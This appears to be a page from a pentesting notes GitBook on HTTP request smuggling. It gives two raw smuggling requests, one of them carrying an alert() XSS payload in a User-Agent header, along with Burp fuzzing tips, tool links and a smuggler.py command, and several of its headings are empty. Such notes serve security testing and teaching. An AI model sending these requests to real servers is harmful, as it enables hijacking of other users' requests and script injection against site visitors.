HTTP Request Smuggling

POST / HTTP/1.1
Host: victim.com
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

Z
0
GET /smuggled HTTP/1.1
Host: victim.com
X: X

Open Redirect

XSS

POST / HTTP/1.1
Host: vuln website
Cookie: {your cookies}
Transfer-Encoding: chunked
Content-Length: 100

0

GET /POST?postID=2 HTTP/1.1
User-Agent: X"><script>alert("XSS")</script>
Content-Type: applications/x-www-form-urlencoded
Content-Length: 5

X=1

Bypassing front-end controls

Stealing Users Requests

Content-Length Size

What size for Content-Length?

Fuzz: Burp Intruder -> Payload type: Number -> Range: 1 to X -> Look for response variations.

Burp Extension

HTTP Request Smuggler

LogoGitHub - PortSwigger/http-request-smugglerGitHub

Tools

LogoGitHub - Moopinger/smugglefuzz: A rapid HTTP downgrade smuggling scanner written in Go.GitHub
LogoGitHub - anshumanpattnaik/http-request-smuggling: HTTP Request Smuggling Detection ToolGitHub
LogoGitHub - defparam/smuggler: Smuggler - An HTTP Request Smuggling / Desync testing tool written in Python 3GitHub
 smuggler.py -u https://target.com

Resources

LogoWhat is HTTP Request Smuggling? A Complete GuideDeepStrike
LogoA Pentester’s Guide to HTTP Request Smuggling | Cobalt Blog

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousHTTP Header ExploitationNextPrice / Checkout Manipulation Methods

Last updated